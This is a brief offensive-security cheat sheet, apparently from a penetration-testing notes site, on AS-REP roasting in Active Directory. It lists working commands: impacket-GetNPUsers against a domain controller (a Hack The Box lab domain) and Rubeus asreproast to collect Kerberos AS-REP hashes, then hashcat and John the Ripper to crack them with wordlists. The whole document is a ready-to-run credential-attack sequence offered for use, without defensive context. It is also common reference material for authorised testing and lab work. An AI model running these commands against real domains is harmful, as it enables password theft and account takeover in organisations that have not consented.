ASP-REP Roasting

Linux

https://hackfa.st/Offensive-Security/Active-Directory/Initial-Attack-Vectors/ASREPRoasting/From-Linux/arrow-up-right

impacket-GetNPUsers -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $ip 'htb.local/'

Windows

https://hackfa.st/Offensive-Security/Active-Directory/Initial-Attack-Vectors/ASREPRoasting/From-Windows/arrow-up-right

.\Rubeus.exe asreproast

Cracking

sudo hashcat -m 18200 ASREProastables.txt -r /usr/share/hashcat/rules/best64.rule --force
john --wordlist=/usr/share/wordlists/rockyou.txt ASREProastables.txt

Last updated